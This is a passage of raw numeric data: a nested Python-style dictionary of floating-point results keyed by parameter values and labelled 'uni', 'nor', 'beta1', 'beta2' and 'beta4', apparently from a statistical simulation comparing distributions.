1.006322838980424, 'beta1': 0.34742183633042256, 'beta2': 1.7091687862980112, 'beta4': 0.1986938433930994}, 500: {'uni': 0.3456791171060871, 'nor': 0.7751979278397534, 'beta1': 0.3440113776197222, 'beta2': 1.2092320961421312, 'beta4': 0.217132298417705}, 400: {'uni': 0.3489269333627507, 'nor': 0.7044423515166887, 'beta1': 0.34411795808308093, 'beta2': 1.0310653608432898, 'beta4': 0.23030128761412128}, 300: {'uni': 0.34837799124822233, 'nor': 0.606506473158486, 'beta1': 0.3492891192903364, 'beta2': 0.9333450580111946, 'beta4': 0.2408361375200047}, 200: {'uni': 0.34730139025972234, 'nor': 0.5272296871475277, 'beta1': 0.33971683925089174, 'beta2': 0.7361677221850133, 'beta4': 0.2637544743748866}, 150: {'uni': 0.34760670816432354, 'nor': 0.481145213232932, 'beta1': 0.3467693322076453, 'beta2': 0.6173032899166593, 'beta4': 0.2750328241811572}, 100: {'uni': 0.3480710820539448, 'nor': 0.4373869135130795, 'beta1': 0.34733880445619963, 'beta2': 0.5217846583202729, 'beta4': 0.29138608643267194}, 75: {'uni': 0.344012344807911, 'nor': 0.4023970962232527, 'beta1': 0.3495418301470877, 'beta2': 0.48385297839039, 'beta4': 0.30746632172742533}, 50: {'uni': 0.3456741024510142, 'nor': 0.387583403531333, 'beta1': 0.3450764110863124, 'beta2': 0.42792581205635305, 'beta4': 0.31493852332853506}, 30: {'uni': 0.34757461968534475, 'nor': 0.3660480324362303, 'beta1': 0.3430535156174783, 'beta2': 0.39516737178821565, 'beta4': 0.3266792953043453}, 20: {'uni': 0.34332496479157215, 'nor': 0.37016864522498233, 'beta1': 0.3438921835770231, 'beta2': 0.3780257022382943, 'beta4': 0.332826430774212}, 10: {'uni': 0.3432638175430853, 'nor': 0.34656732461796685, 'beta1': 0.34530041961548025, 'beta2': 0.3621336740217708, 'beta4': 0.33301573335144213}}, 200: {1000: {'uni': 0.35397577006236064, 'nor': 1.6880107688499668, 'beta1': 0.3509512766017229, 'beta2': 2.5472310916904464, 'beta4': 0.17937070455079063}, 750: {'uni': 0.3534492950521917, 'nor': 1.3462174364691601, 'beta1': 0.34252933428118637, 'beta2': 1.9997138016373859, 'beta4': 0.18808720501818546}, 500: {'uni': 0.3414087298618831, 'nor': 1.003233841927636, 'beta1': 0.3453809732427485, 'beta2': 1.4542100041390176, 'beta4': 0.2028182073608281}, 400: {'uni': 0.3458951879188956, 'nor': 0.8685866682805892, 'beta1': 0.34743230253372726, 'beta2': 1.332099610483853, 'beta4': 0.20908071122056882}, 300: {'uni': 0.3471664547886561, 'nor': 0.727794381484671, 'beta1': 0.35076929096112525, 'beta2': 1.0434269108804657, 'beta4': 0.22423365788256022}, 200: {'uni': 0.34413238821258607, 'nor': 0.6147359660914746, 'beta1': 0.35089981074426324, 'beta2': 0.8099260333831554, 'beta4': 0.24358797686705402}, 150: {'uni': 0.339936102320085, 'nor': 0.55221617457234, 'beta1': 0.34616688013398644, 'beta2': 0.7051079677507086, 'beta4': 0.2505100139108426}, 100: {'uni': 0.3446261265431087, 'nor': 0.4792836523502122, 'beta1': 0.35142451365868926, 'beta2': 0.5858619038731584, 'beta4': 0.2751043217476785}, 75: {'uni': 0.3478642666164821, 'nor': 0.45888115676348, 'beta1': 0.3486583947927791, 'beta2': 0.5164284462675127, 'beta4': 0.28845638479831875}, 50: {'uni': 0.34103513391692986, 'nor': 0.41208649872391234, 'beta1': 0.344884394694451, 'beta2': 0.45971215774307156, 'beta4': 0.29938022874279796}, 30: {'uni': 0.3481030712621901, 'nor': 0.3894583006944668, 'beta1': 0.34717964633738396, 'beta2': 0.4096578744766348, 'beta4': 0.3197560171684093}, 20: {'uni': 0.33983037641029334, 'nor': 0.37505954789145096, 'beta1': 0.3487484160639571, 'beta2': 0.38550515120020684, 'beta4': 0.32511678116663717}, 10: {'uni': 0.34648485570776455, 'nor': 0.36054087791292677, 'beta1': 0.3457880198406115, 'beta2': 0.36093745693627277, 'beta4': 0.33750493584405156}}, 150: {1000: {'uni': 0.35855679355645487, 'nor': 2.137814211516231, 'beta1': 0.3505282691209241, 'beta2': 2.9019884065488495, 'beta4': 0.17157691794475752}, 750: {'uni': 0.3520800612264919, 'nor': 1.7021693510463247, 'beta1': 0.3511398978439243, 'beta2': 2.269796020841365, 'beta4': 0.17947834909802796}, 500: {'uni': 0.35011570165384504, 'nor': 1.2462148272826032, 'beta1': 0.34610681903199625, 'beta2': 1.7552755586485762, 'beta4': 0.19119731999075687}, 400: {'uni': 0.3456329512316953, 'nor': 1.0590359965214562, 'beta1': 0.35014065898105695, 'beta2': 1.4313410427332007, 'beta4': 0.19623036838033153}, 300: {'uni': 0.34527118758550485, 'nor': 0.8812749025718438, 'beta1': 0.34944394458697825, 'beta2': 1.1588075057993832, 'beta4': 0.20771969576432014}, 200: {'uni': 0.3489738989982756, 'nor': 0.7014599135166738, 'beta1': 0.34830333644666117, 'beta2': 0.915340546836583, 'beta4': 0.2263531728160868}, 150: {'uni': 0.3429228048276349, 'nor': 0.6165824034990142, 'beta1': 0.34343683973228967, 'beta2': 0.7566890470098447, 'beta4': 0.24382109386295112}, 100: {'uni': 0.3425285186465402, 'nor': 0.5317499572943216, 'beta1': 0.3454943851918104, 'beta2': 0.6240602607130921, 'beta4': 0.26276196224188025}, 75: {'uni': 0.3473550254909798, 'nor': 0.4781796971737509, 'beta1': 0.3493724223269961, 'beta2': 0.5591888563697984, 'beta4': 0.27778273801276504}, 50: {'uni': 0.3428279297727261, 'nor': 0.43535250166487094, 'beta1': 0.3442214225564261, 'beta2': 0.479908838662072, 'beta4': 0.2937106328128505}, 30: {'uni': 0.3418794080578704, 'nor': 0.40103316462979616, 'beta1': 0.3499534241478493, 'beta2': 0.4227810467699822, 'beta4': 0.3102985640146892}, 20: {'uni': 0.34811502141065576, 'nor': 0.38549582915429814, 'beta1': 0.3441463547925956, 'beta2': 0.39277202188140015, 'beta4': 0.3187336459718889}, 10: {'uni': 0.34330862403529744, 'nor': 0.36346435616006495, 'beta1': 0.3469201841472034, 'beta2': 0.3581487076523773, 'beta4': 0.3327277447628047}}, 100: {1000: {'uni': 0.3722831918742666, 'nor': 3.0381615766629624, 'beta1': 0.3487812436005163, 'beta2': 3.4056411541631597, 'beta4': 0.16687909663377307}, 750: {'uni': 0.36086762860351934, 'nor': 2.3794615987237338, 'beta1': 0.351189585306215, 'beta2': 2.5949293863952536, 'beta4': 0.1709871528017898}, 500: {'uni': 0.349805023733788, 'nor': 1.7056246948939178, 'beta1': 0.3475762510915695, 'beta2': 1.9018134806788765, 'beta4': 0.17969632659255938}, 400: {'uni': 0.3490677824745589, 'nor': 1.3999121462123332, 'beta1': 0.3507443961701372, 'beta2': 1.6095123649369334, 'beta4': 0.18579332318138084}, 300: {'uni': 0.34879085377563823, 'nor': 1.1658197529948917, 'beta1': 0.34774454661138066, 'beta2': 1.3183855664195328, 'beta4': 0.19580380328549032}, 200: {'uni': 0.34331340368316626, 'nor': 0.8793367098901197, 'beta1': 0.3449855343207457, 'beta2': 1.0296524804053566, 'beta4': 0.21178290032007802}, 150: {'uni': 0.34134065052350926, 'nor': 0.7550776311919849, 'beta1': 0.3438476193999038, 'beta2': 0.8356367089354535, 'beta4': 0.2243814426924324}, 100: {'uni': 0.34494961517463724, 'nor': 0.6074739448155042, 'beta1': 0.350538922675542, 'beta2': 0.6833257829663539, 'beta4': 0.2435075875469618}, 75: {'uni': 0.34823909271266096, 'nor': 0.5506586574743351, 'beta1': 0.3450886289873298, 'beta2': 0.5985491404272344, 'beta4': 0.2562367198191135}, 50: {'uni': 0.3445907688697594, 'nor': 0.4892029171428822, 'beta1': 0.351685420248068, 'beta2': 0.50463513631763, 'beta4': 0.2721121885598124}, 30: {'uni': 0.34380387455691164, 'nor': 0.42482766423752505, 'beta1': 0.3517093374868383, 'beta2': 0.433137251893754, 'beta4': 0.29889400163605306}, 20: {'uni': 0.34761787684419804, 'nor': 0.40063690078106884, 'beta1': 0.34569487097161505, 'beta2': 0.4043324689835272, 'beta4': 0.3099384406707861}, 10: {'uni': 0.3368231032278602, 'nor': 0.37414139322084167, 'beta1': 0.34526172651145914, 'beta2': 0.3768152424104807, 'beta4': 0.3258793776432392}}, 75: {1000: {'uni': 0.38032079371458866, 'nor': 3.893179411720956, 'beta1': 0.33895197976916025, 'beta2': 3.665817783885145, 'beta4': 0.16221681570587448}, 750: {'uni': 0.3774896680042954, 'nor': 3.041307612796793, 'beta1': 0.3531047623969306, 'beta2': 2.9177298137115932, 'beta4': 0.16760701259293861}, 500: {'uni': 0.3691603809627662, 'nor': 2.1136522720926076, 'beta1': 0.3506731318868911, 'beta2': 2.0800219389279033, 'beta4': 0.17237248115050258}, 400: {'uni': 0.3542804938614184, 'nor': 1.7635783367478515, 'beta1': 0.3480209110363151, 'beta2': 1.753279431906443, 'beta4': 0.17877015455578205}, 300: {'uni': 0.3530910129911514, 'nor': 1.40824257505653, 'beta1': 0.3468992232652649, 'beta2': 1.4286138146048428, 'beta4': 0.18618258284509892}, 200: {'uni': 0.35404448422917234, 'nor': 1.0871523518236694, 'beta1': 0.34676310798083787, 'beta2': 1.0969581653639313, 'beta4': 0.19917988881180035}, 150: {'uni': 0.3471357147047061, 'nor': 0.8860821820154345, 'beta1': 0.34219905448064564, 'beta2': 0.9223710573153442, 'beta4': 0.21007320251501296}, 100: {'uni': 0.3473811058881694, 'nor': 0.715183149921106, 'beta1': 0.34386435910210156, 'beta2': 0.7290266843292309, 'beta4': 0.2302230863314267}, 75: {'uni': 0.34480847684480825, 'nor': 0.6128517103087979, 'beta1': 0.3490544903490166, 'beta2': 0.6210256341169503, 'beta4': 0.23928023154694925}, 50: {'uni': 0.3519634286283122, 'nor': 0.535269531408463, 'beta1': 0.3485012701192417, 'beta2': 0.529307351668824, 'beta4': 0.26177269899069644}, 30: {'uni': 0.34761067896637265, 'nor': 0.460593353930858, 'beta1': 0.3460459195016941, 'beta2': 0.4519827169452344, 'beta4': 0.289949655149545}, 20: {'uni': 0.3468412967012832, 'nor': 0.42130771837669, 'beta1': 0.34702385398283925, 'beta2': 0.42403711754723916, 'beta4': 0.3001880754924463}, 10: {'uni': 0.3395056585563256, 'nor': 0.38398628388024797, 'beta1': 0.34266048288383505, 'beta2': 0.37609257537094914, 'beta4': 0.32389503113475765}}, 50: {1000: {'uni': 0.4347386296621316, 'nor': 5.903113283717573, 'beta1': 0.3458499082519396, 'beta2': 4.56059131081475, 'beta4': 0.16177924865526983}, 750: {'uni': 0.4080484429773817, 'nor': 4.462441182886646, 'beta1': 0.3448072378752806, 'beta2': 3.627354125296263, 'beta4': 0.16521179391821397}, 500: {'uni': 0.3852363552796836, 'nor': 3.0766708652850117, 'beta1': 0.3474481187838615, 'beta2': 2.544804667262524, 'beta4': 0.16604306303156843}, 400: {'uni': 0.38227668686292127, 'nor': 2.548974709246717, 'beta1': 0.3564344226224531, 'beta2': 2.1034143877988716, 'beta4': 0.16997498457387009}, 300: {'uni': 0.36482493041269376, 'nor': 1.9887184654132837, 'beta1': 0.34800510793556466, 'beta2': 1.6526246501307664, 'beta4': 0.17253160277881177}, 200: {'uni': 0.36337018580466046, 'nor': 1.4457332170143293, 'beta1': 0.3510141513992577, 'beta2': 1.2763395931108832, 'beta4': 0.18462120515319508}, 150: {'uni': 0.35577904314930736, 'nor': 1.1558700394945114, 'beta1': 0.34949146441961493, 'beta2': 1.0592480702192182, 'beta4': 0.19561796749180563}, 100: {'uni': 0.3477172098075887, 'nor': 0.9073729769528663, 'beta1': 0.3450185824743941, 'beta2': 0.8094515457094794, 'beta4': 0.2071546414569944}, 75: {'uni': 0.34125034122921394, 'nor': 0.7547201637839731, 'beta1': 0.3456874754796907, 'beta2': 0.7017239279026216, 'beta4': 0.21922659978150177}, 50: {'uni': 0.33880945045029826, 'nor': 0.6079205186753285, 'beta1': 0.3543737005717827, 'beta2': 0.5816117115186251, 'beta4': 0.24353668852069424}, 30: {'uni': 0.3431007994484497, 'nor': 0.515581573279696, 'beta1': 0.346492905581158, 'beta2': 0.4727465341515703, 'beta4': 0.2707420287422262}, 20: {'uni': 0.33540476537955854, 'nor': 0.45520516780061937, 'beta1': 0.3406042857634804, 'beta2': 0.42569063054856937, 'beta4': 0.2864332225489485}, 10: {'uni': 0.34219260815428754, 'nor': 0.4030004368028241, 'beta1': 0.3424555787270816, 'beta2': 0.3895108454898639, 'beta4': 0.3134271440491817}}, 30: {1000: {'uni': 0.5912672207776604, 'nor': 9.527258371560922, 'beta1': 0.36358902818996824, 'beta2': 6.0474393748944255, 'beta4': 0.1566183550644414}, 750: {'uni': 0.5205276415999436, 'nor': 7.1846290287913535, 'beta1': 0.36042655724639866, 'beta2': 4.721207847858767, 'beta4': 0.15817695286915404}, 500: {'uni': 0.458945074914611, 'nor': 4.9438685876332675, 'beta1': 0.3512022799112701, 'beta2': 3.277870745954269, 'beta4': 0.16010949046042697}, 400: {'uni': 0.4392171770850031, 'nor': 4.040052462527793, 'beta1': 0.34937995162981234, 'beta2': 2.685259178691964, 'beta4': 0.16469616287949998}, 300: {'uni': 0.4042998393631235, 'nor': 3.1228108633451424, 'beta1': 0.35391590930846445, 'beta2': 2.0726334265315987, 'beta4': 0.16673640336372708}, 200: {'uni': 0.387238644411021, 'nor': 2.1704115878479118, 'beta1': 0.34614994776463975, 'beta2': 1.5341779941768152, 'beta4': 0.17262425762789227}, 150: {'uni': 0.3718021016553037, 'nor': 1.6935285337198958, 'beta1': 0.345108376430461, 'beta2': 1.2073441904012723, 'beta4': 0.1762258439064716}, 100: {'uni': 0.3584866807874342, 'nor': 1.2538009391466625, 'beta1': 0.3450931333761505, 'beta2': 0.9488607884476075, 'beta4': 0.18927407539036956}, 75: {'uni': 0.35116467381518124, 'nor': 1.0239932402161527, 'beta1': 0.3464071359362087, 'beta2': 0.8024377076076704, 'beta4': 0.20216287361165863}, 50: {'uni': 0.34245713359424695, 'nor': 0.811421429036936, 'beta1': 0.3488815710989564, 'beta2': 0.638751193692387, 'beta4': 0.2176599981779147}, 30: {'uni': 0.34903831332483576, 'nor': 0.6147648924540778, 'beta1': 0.3440196877298809, 'beta2': 0.515506440973083, 'beta4': 0.24016190092594067}, 20: {'uni': 0.33737476805183686, 'nor': 0.5309803958803571, 'beta1': 0.34097608432305376, 'beta2': 0.4582370367023497, 'beta4': 0.26284911332188543}, 10: {'uni': 0.33781041301044673, 'nor': 0.4419972892631432, 'beta1': 0.34437991388723727, 'beta2': 0.3942969069743231, 'beta4': 0.2865988298916934}}, 20: {1000: {'uni': 0.8965909515980386, 'nor': 14.43160261621047, 'beta1': 0.40879724910349813, 'beta2': 7.703097044523489, 'beta4': 0.15777136298750422}, 750: {'uni': 0.7465181212742386, 'nor': 10.80135778166109, 'beta1': 0.38921094677035356, 'beta2': 5.9974942469122325, 'beta4': 0.15998239385661403}, 500: {'uni': 0.6088672984749545, 'nor': 7.304689028033914, 'beta1': 0.373771541626272, 'beta2': 4.027137560010544, 'beta4': 0.16163415741805556}, 400: {'uni': 0.5512936057820512, 'nor': 5.956240612141846, 'beta1': 0.3697285679426312, 'beta2': 3.335922157039538, 'beta4': 0.1611260117755855}, 300: {'uni': 0.49676954291719955, 'nor': 4.58931566065136, 'beta1': 0.35950999134779804, 'beta2': 2.583167677932982, 'beta4': 0.1622195846063796}, 200: {'uni': 0.43568253433790133, 'nor': 3.1173720871603443, 'beta1': 0.3464265148706499, 'beta2': 1.8079860961396275, 'beta4': 0.16758797337107686}, 150: {'uni': 0.4046165586714504, 'nor': 2.4195703053430293, 'beta1': 0.3531443387784461, 'beta2': 1.4753331116985116, 'beta4': 0.16965491542778036}, 100: {'uni': 0.3762742643740686, 'nor': 1.765288822689759, 'beta1': 0.3524276940513375, 'beta2': 1.0841173374160238, 'beta4': 0.17845587683466202}, 75: {'uni': 0.36218638835697453, 'nor': 1.3876888573033577, 'beta1': 0.3503939829222516, 'beta2': 0.8954861247858222, 'beta4': 0.1877690214122453}, 50: {'uni': 0.3521418775849935, 'nor': 1.0414912127014189, 'beta1': 0.34022528133363233, 'beta2': 0.7054403223889628, 'beta4': 0.20028939322658593}, 30: {'uni': 0.3426909931385447, 'nor': 0.7675040513769444, 'beta1': 0.34053541174088253, 'beta2': 0.5503420280923643, 'beta4': 0.2215057999895056}, 20: {'uni': 0.3363305461705004, 'nor': 0.6255214087625113, 'beta1': 0.33491632393555937, 'beta2': 0.46832505580377143, 'beta4': 0.24284505128556536}, 10: {'uni': 0.33518761864677465, 'nor': 0.4931184293561005, 'beta1': 0.3391485976534156, 'beta2': 0.39630521127982427, 'beta4': 0.27139530895291425}}, 10: {1000: {'uni': 2.3874340797968814, 'nor': 29.663480850360397, 'beta1': 0.9169229003489705, 'beta2': 12.20925559858758, 'beta4': 0.1564888636547848}, 750: {'uni': 1.8615157681014205, 'nor': 21.801968499676818, 'beta1': 0.7473940671291324, 'beta2': 9.267094002909307, 'beta4': 0.1561349717825088}, 500: {'uni': 1.3134854154935922, 'nor': 15.249137564401448, 'beta1': 0.5934628187469416, 'beta2': 6.175670299414178, 'beta4': 0.1576162013654804}, 400: {'uni': 1.1145075409375296, 'nor': 11.974411479422269, 'beta1': 0.5301830934992371, 'beta2': 5.140934047559648, 'beta4': 0.15897679114618293}, 300: {'uni': 0.9078215986658665, 'nor': 8.868858736093818, 'beta1': 0.4850422676075548, 'beta2': 3.8520697501497536, 'beta4': 0.15601309502687813}, 200: {'uni': 0.7081080566694192, 'nor': 6.227802150964231, 'beta1': 0.4280233051488676, 'beta2': 2.6977738374144065, 'beta4': 0.16111656347952902}, 150: {'uni': 0.6007454684465097, 'nor': 4.710059470113114, 'beta1': 0.3990084689677828, 'beta2': 2.0564056256518675, 'beta4': 0.1627500664646643}, 100: {'uni': 0.49761742864535224, 'nor': 3.250988568599194, 'beta1': 0.3737337332326855, 'beta2': 1.4561033940469712, 'beta4': 0.1665861437159576}, 75: {'uni': 0.4503391470649682, 'nor': 2.5306944092179675, 'beta1': 0.36124674699535686, 'beta2': 1.1922233929028405, 'beta4': 0.16676211842199312}, 50: {'uni': 0.40116564754189815, 'nor': 1.8282171177299855, 'beta1': 0.35304130396901157, 'beta2': 0.8794730305256969, 'beta4': 0.17737449940003902}, 30: {'uni': 0.35980970739758494, 'nor': 1.222640887186312, 'beta1': 0.3400081965549426, 'beta2': 0.6511660921260646, 'beta4': 0.18895070743803286}, 20: {'uni': 0.34682134148512966, 'nor': 0.9477562627590225, 'beta1': 0.33450338225464055, 'beta2': 0.538055747077308, 'beta4': 0.2062208052648477}, 10: {'uni': 0.3311807215098405, 'nor': 0.6394074548870496, 'beta1': 0.3301935234529011, 'beta2': 0.41808098738012345, 'beta4': 0.239050783112545}}}, 0.2: {1000: {1000: {'uni': 0.24124725799461827, 'nor': 0.4053264452318229, 'beta1': 0.23914293982059717, 'beta2': 1.0509959984580306, 'beta4': 0.17568080256625232}, 750: {'uni': 0.24164388268120782, 'nor': 0.3687830499658719, 'beta1': 0.243028138607501, 'beta2': 0.784731460864333, 'beta4': 0.18815121077723373}, 500: {'uni': 0.24326842966163004, 'nor': 0.32463820180526554, 'beta1': 0.24310356844769024, 'beta2': 0.560609377317712, 'beta4': 0.19960017726532056}, 400: {'uni': 0.23902795484816924, 'nor': 0.3125538120607967, 'beta1': 0.24223057995297714, 'beta2': 0.4770053150772008, 'beta4': 0.20309690339198788}, 300: {'uni': 0.23869851303079107, 'nor': 0.2917904746847079, 'beta1': 0.23805489672369276, 'beta2': 0.4061962989224635, 'beta4': 0.21148616699287323}, 200: {'uni': 0.24368185962341393, 'nor': 0.279239353863688, 'beta1': 0.24329991362449854, 'beta2': 0.3464015419031672, 'beta4': 0.21701422300653347}, 150: {'uni': 0.23805417073622206, 'nor': 0.2648108143069742, 'beta1': 0.24112587613874334, 'beta2': 0.3169793434410238, 'beta4': 0.22625899182567927}, 100: {'uni': 0.24112468954747324, 'nor': 0.2555534679342511, 'beta1': 0.24391216254475265, 'beta2': 0.2811465587345888, 'beta4': 0.22615912967234958}, 75: {'uni': 0.2377789796740822, 'nor': 0.2502177301730839, 'beta1': 0.23897299843042535, 'beta2': 0.27291284924753667, 'beta4': 0.23102167971177617}, 50: {'uni': 0.2420481229386659, 'nor': 0.2483541709202484, 'beta1': 0.2395019750658544, 'beta2': 0.26178626368274266, 'beta4': 0.2378697343455223}, 30: {'uni': 0.23839523280714542, 'nor': 0.2448261144336522, 'beta1': 0.24297869273136183, 'beta2': 0.2549842966602735, 'beta4': 0.2344566138825933}, 20: {'uni': 0.24294085836130722, 'nor': 0.2459984385174377, 'beta1': 0.2409977912230283, 'beta2': 0.24836430873811524, 'beta4': 0.24236541724974348}, 10: {'uni': 0.23996750948003354, 'nor': 0.24319752879898954, 'beta1': 0.24061748766076452, 'beta2': 0.24848114887420777, 'beta4': 0.23742872285699368}}, 750: {1000: {'uni': 0.24213602459464384, 'nor': 0.4668947186186115, 'beta1': 0.2400298002859102, 'beta2': 1.0537929179775296, 'beta4': 0.16960490699279673}, 750: {'uni': 0.24252558303608956, 'nor': 0.40252237715680944, 'beta1': 0.24007629950163753, 'beta2': 0.7880701340760959, 'beta4': 0.17806957712390817}, 500: {'uni': 0.24364703012383299, 'nor': 0.34998153650454966, 'beta1': 0.24139971779624214, 'beta2': 0.5617828287616604, 'beta4': 0.1912425902387635}, 400: {'uni': 0.24147766494729744, 'nor': 0.33073040328340325, 'beta1': 0.23886051231633573, 'beta2': 0.4821271764245669, 'beta4': 0.19650526443681385}, 300: {'uni': 0.24537594610132082, 'nor': 0.30608768980075746, 'beta1': 0.23858930631150674, 'beta2': 0.41147281542567865, 'beta4': 0.20502061090216653}, 200: {'uni': 0.24268617663557088, 'nor': 0.2891942420581909, 'beta1': 0.24104096550685916, 'beta2': 0.3549441465252581, 'beta4': 0.21514022394369312}, 150: {'uni': 0.24034254831699772, 'nor': 0.2725893818027367, 'beta1': 0.23968652814412453, 'beta2': 0.32196628110834, 'beta4': 0.22158539656940412}, 100: {'uni': 0.24066960454670216, 'nor': 0.26072438431981576, 'beta1': 0.23860999283751405, 'beta2': 0.295308268894434, 'beta4': 0.22468320403577302}, 75: {'uni': 0.2372348854433789, 'nor': 0.2577253003131136, 'beta1': 0.23904507681739837, 'beta2': 0.2808413650663696, 'beta4': 0.22998494050062063}, 50: {'uni': 0.24162659968427913, 'nor': 0.25234746676918207, 'beta1': 0.24423303357816123, 'beta2': 0.26517888856634686, 'beta4': 0.23259076555479863}, 30: {'uni': 0.24026106701043032, 'nor': 0.24910214073724177, 'beta1': 0.2405253750459323, 'beta2': 0.2551649499009466, 'beta4': 0.2365634356538571}, 20: {'uni': 0.24267815059641026, 'nor': 0.245298372253819, 'beta1': 0.24080870936687, 'beta2': 0.2552267059461294, 'beta4': 0.24100356768933173}, 10: {'uni': 0.24456210577096196, 'nor': 0.24477627325344592, 'beta1': 0.24555026833090088, 'beta2': 0.242950667829395, 'beta4': 0.24155735139737788}}, 500: {1000: {'uni': 0.24164987087115197, 'nor': 0.5721918782884466, 'beta1': 0.23996298637023378, 'beta2': 1.1779948690165256, 'beta4': 0.15428354475510184}, 750: {'uni': 0.24159673038840507, 'nor': 0.4918971663930825, 'beta1': 0.24120994313020436, 'beta2': 0.8803516369213815, 'beta4': 0.16565776898213674}, 500: {'uni': 0.23991550021580707, 'nor': 0.4101489076635629, 'beta1': 0.23929053512796192, 'beta2': 0.6491947662249905, 'beta4': 0.17883673195668998}, 400: {'uni': 0.24251723206941572, 'nor': 0.36960634216527005, 'beta1': 0.24277119423256865, 'beta2': 0.5505149369922498, 'beta4': 0.18419162201388328}, 300: {'uni': 0.24179003293271845, 'nor': 0.33510396603618053, 'beta1': 0.24003491428852153, 'beta2': 0.4621704086743315, 'beta4': 0.19345184620978545}, 200: {'uni': 0.24008858690578336, 'nor': 0.30561704025672465, 'beta1': 0.2411289063793809, 'beta2': 0.38799140893024225, 'beta4': 0.20430036700083373}, 150: {'uni': 0.2402127113334836, 'nor': 0.29359145762455585, 'beta1': 0.24097953145287435, 'beta2': 0.35422332515291893, 'beta4': 0.21168379467345955}, 100: {'uni': 0.24266553946279426, 'nor': 0.2764289867601266, 'beta1': 0.23940472376646318, 'beta2': 0.3109340118793721, 'beta4': 0.22327921524434563}, 75: {'uni': 0.24228255563926224, 'nor': 0.2684971154591404, 'beta1': 0.24478704183107347, 'beta2': 0.2904293862430301, 'beta4': 0.2222914607306522}, 50: {'uni': 0.24336271099583262, 'nor': 0.2573476188536372, 'beta1': 0.23890548191925962, 'beta2': 0.2784552417268729, 'beta4': 0.22861542581896685}, 30: {'uni': 0.24204605571751606, 'nor': 0.25108561658127865, 'beta1': 0.24555355114900856, 'beta2': 0.2627389376158154, 'beta4': 0.23170001504553606}, 20: {'uni': 0.24073537437234863, 'nor': 0.2470271721892606, 'beta1': 0.2464463166884145, 'beta2': 0.25549256236330153, 'beta4': 0.24037869393451103}, 10: {'uni': 0.24247329417887659, 'nor': 0.2441965770243582, 'beta1': 0.24103184940811473, 'beta2': 0.2520935857785229, 'beta4': 0.23862365558069581}}, 400: {1000: {'uni': 0.24211427327472068, 'nor': 0.676319267340814, 'beta1': 0.24108390834726123, 'beta2': 1.1690252804190693, 'beta4': 0.15078182161253156}, 750: {'uni': 0.24267791300187727, 'nor': 0.5501413249911372, 'beta1': 0.242775031630821, 'beta2': 0.897697338268199, 'beta4': 0.15869834269819497}, 500: {'uni': 0.24145820022964667, 'nor': 0.4521520593828404, 'beta1': 0.2418804659547599, 'beta2': 0.6550622764615105, 'beta4': 0.16977219676395533}, 400: {'uni': 0.23821559225819358, 'nor': 0.4102458629344209, 'beta1': 0.23743320963502837, 'beta2': 0.5687082029198804, 'beta4': 0.17623787502407762}, 300: {'uni': 0.23986191363478224, 'nor': 0.36396123975400607, 'beta1': 0.24081073282914195, 'beta2': 0.4752804571225306, 'beta4': 0.18821500754467457}, 200: {'uni': 0.24029454257379748, 'nor': 0.3223034871436207, 'beta1': 0.2399555016919217, 'beta2': 0.41519656419281536, 'beta4': 0.19773039648651466}, 150: {'uni': 0.24112635756275794, 'nor': 0.3034935016307265, 'beta1': 0.2435734602722558, 'beta2': 0.36533428802282, 'beta4': 0.20514348419020711}, 100: {'uni': 0.23780523639691478, 'nor': 0.2831084401784451, 'beta1': 0.23747175043173488, 'beta2': 0.31735429345053373, 'beta4': 0.21660212309631313}, 75: {'uni': 0.2418157552287163, 'nor': 0.26979755399473915, 'beta1': 0.24058627879036779, 'beta2': 0.3005365712461821, 'beta4': 0.21980198569077422}, 50: {'uni': 0.24415674401788423, 'nor': 0.25836745432753955, 'beta1': 0.23928001830324636, 'beta2': 0.27485770957941486, 'beta4': 0.22835111909074343}, 30: {'uni': 0.24609118802801827, 'nor': 0.2534347434770235, 'beta1': 0.23925830272224197, 'beta2': 0.2638635206820125, 'beta4': 0.22976503900007766}, 20: {'uni': 0.23922321624939863, 'nor': 0.24850008485696506, 'beta1': 0.24063011653162658, 'beta2': 0.2552606058417734, 'beta4': 0.23485042539952278}, 10: {'uni': 0.24240830716178507, 'nor': 0.24239798495104373, 'beta1': 0.23901416919802654, 'beta2': 0.252340339870926, 'beta4': 0.23662410365477324}}, 300: {1000: {'uni': 0.243053898871161, 'nor': 0.8232114454294339, 'beta1': 0.24213327571940335, 'beta2': 1.2649793578697028, 'beta4': 0.1434865846334235}, 750: {'uni': 0.24277697138409443, 'nor': 0.671128181328664, 'beta1': 0.2382122025024967, 'beta2': 0.9610201013925472, 'beta4': 0.15099442381409264}, 500: {'uni': 0.2415441903390995, 'nor': 0.5239011024630138, 'beta1': 0.24085249976123604, 'beta2': 0.7160923462546679, 'beta4': 0.16032455575028098}, 400: {'uni': 0.24090473568312606, 'nor': 0.4589917188298054, 'beta1': 0.2401089340456763, 'beta2': 0.6134753236562074, 'beta4': 0.16832475453109194}, 300: {'uni': 0.24176994785336725, 'nor': 0.4131159780152836, 'beta1': 0.23737268022389493, 'beta2': 0.5633941361756649, 'beta4': 0.17658015943691016}, 200: {'uni': 0.23828816545809994, 'nor': 0.3487354251401745, 'beta1': 0.2429355648970097, 'beta2': 0.43986284067280296, 'beta4': 0.190705297281293}, 150: {'uni': 0.24255538533158844, 'nor': 0.32509313749389934, 'beta1': 0.2389950310201909, 'beta2': 0.38991759246533064, 'beta4': 0.19629155163725026}, 100: {'uni': 0.24095331519349314, 'nor': 0.2963437976654876, 'beta1': 0.23965188272123855, 'beta2': 0.33545367591531955, 'beta4': 0.21099104990350545}, 75: {'uni': 0.24221950168410636, 'nor': 0.28546070154906056, 'beta1': 0.2429247640798027, 'beta2': 0.3160255362155384, 'beta4': 0.21049215049193679}, 50: {'uni': 0.24069007546929116, 'nor': 0.26907721641204213, 'beta1': 0.24312415693432637, 'beta2': 0.2909340446638638, 'beta4': 0.22154246200364566}, 30: {'uni': 0.23923154893167575, 'nor': 0.2622736680244658, 'beta1': 0.2400516003722522, 'beta2': 0.2665968226643333, 'beta4': 0.2323366436504289}, 20: {'uni': 0.24138941949164475, 'nor': 0.2551655584694042, 'beta1': 0.24213498137771242, 'beta2': 0.2584842482144281, 'beta4': 0.23566993903051417}, 10: {'uni': 0.2432209669937062, 'nor': 0.25283907350595836, 'beta1': 0.2431742501646928, 'beta2': 0.25078409064276774, 'beta4': 0.23529627943263173}}, 200: {1000: {'uni': 0.24499660366604434, 'nor': 1.097639817869575, 'beta1': 0.23911455181052824, 'beta2': 1.4649285026997207, 'beta4': 0.1359651395598983}, 750: {'uni': 0.24199851808800438, 'nor': 0.887824725825296, 'beta1': 0.2413967087754142, 'beta2': 1.1334345439634328, 'beta4': 0.14047516993915654}, 500: {'uni': 0.24014075287593903, 'nor': 0.6594000341543945, 'beta1': 